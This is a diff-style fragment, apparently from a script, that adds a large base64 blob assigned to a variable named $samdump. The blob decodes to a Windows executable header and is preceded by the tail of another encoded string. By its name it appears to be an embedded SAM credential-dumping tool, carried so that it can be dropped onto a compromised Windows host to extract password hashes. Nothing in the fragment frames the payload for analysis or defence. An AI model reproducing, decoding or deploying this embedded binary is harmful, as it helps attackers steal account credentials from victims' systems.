+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
+
+$samdump="TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
+ZGUuDQ0KJAAAAAAAAABQRQAATAEFAHD4djQAAAAAAAAAAOAADgELAQMKALIAAABqAAAAAAAAAFIA
+AAAQAAAA0AAAAABAAAAQAAAAAgAABAAAAAAAAAAEAAAAAAAAAABQAQAABAAAAAAAAAMAAAAAABAA
+ABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAAAgAQAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAADABAOwKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAYIQEA8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC50ZXh0AAAAhLEAAAAQAAAAsgAAAAQA
+AAAAAAAAAAAAAAAAACAAAGAucmRhdGEAAAgfAAAA0AAAACAAAAC2AAAAAAAAAAAAAAAAAABAAABA
+LmRhdGEAAAAULwAAAPAAAAAcAAAA1gAAAAAAAAAAAAAAAAAAQAAAwC5pZGF0YQAAJAYAAAAgAQAA
+CAAAAPIAAAAAAAAAAAAAAAAAAEAAAMAucmVsb2MAACQQAAAAMAEAABIAAAD6AAAAAAAAAAAAAAAA
+AABAAABCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+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
+M/oz2ovHJQD8AADB6AjBywSLqADbQACLwyUA/AAAwegIM6gA3EAAi8clAAD8AMHoEDOoAN1AAIvD
+JQAA/ADB6BAzqADeQACLxyX////8gef8AAAAwegYM6gA30AAi8Ml/////IHj/AAAAMHoGDOoAOBA
+ADOvANlAAIt+CDOrANpAAIteDDPNM/kz2YvHJQD8AADB6AjBywSLqADbQACLwyUA/AAAwegIM6gA
+3EAAi8clAAD8AMHoEDOoAN1AAIvDJQAA/ADB6BAzqADeQACLxyX////8wegYM6gA30AAi8Ml////
+/MHoGIHn/AAAAIHj/AAAADOoAOBAADOvANlAAIt+EDOrANpAAIteFDPVM/oz2ovHJQD8AADB6AjB
+ywSLqADbQACLwyUA/AAAwegIM6gA3EAAi8clAAD8AMHoEDOoAN1AAIvDJQAA/ADB6BAzqADeQACL
+xyX////8gef8AAAAwegYM6gA30AAi8Ml/////IHj/AAAAMHoGDOoAOBAADOvANlAAIt+GDOrANpA
+AIteHDPNM/kz2cHLBIvHi+slAPwAAIHlAPwAAMHoCMHtCIuAANtAADOFANxAAIvvgeUAAPwAwe0Q
+M4UA3UAAi+uB5QAA/ADB7RAzhQDeQACDxiCL74Hn/AAAAIHl/////MHtGDOFAN9AAIvrgeX////8
+geP8AAAAwe0YM4UA4EAAM4cA2UAAM4MA2kAAM9D/TCQQD4XT/f//6TMCAADHRCQQBAAAAIPGeIs+
+i14EM/oz2ovHJQD8AADB6AjBywSLqADbQACLwyUA/AAAwegIM6gA3EAAi8clAAD8AMHoEDOoAN1A
+AIvDJQAA/ADB6BAzqADeQACLxyX////8gef8AAAAwegYM6gA30AAi8Ml/////IHj/AAAAMHoGDOo
+AOBAADOvANlAAIt++DOrANpAAIte/DPNM/kz2YvHJQD8AADB6AjBywSLqADbQACLwyUA/AAAwegI
+M6gA3EAAi8clAAD8AMHoEDOoAN1AAIvDJQAA/ADB6BAzqADeQACLxyX////8wegYM6gA30AAi8Ml
+/////MHoGIHn/AAAAIHj/AAAADOoAOBAADOvANlAAIt+8DOrANpAAIte9DPVM/oz2ovHJQD8AADB
+6AjBywSLqADbQACLwyUA/AAAwegIM6gA3EAAi8clAAD8AMHoEDOoAN1AAIvDJQAA/ADB6BAzqADe
+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
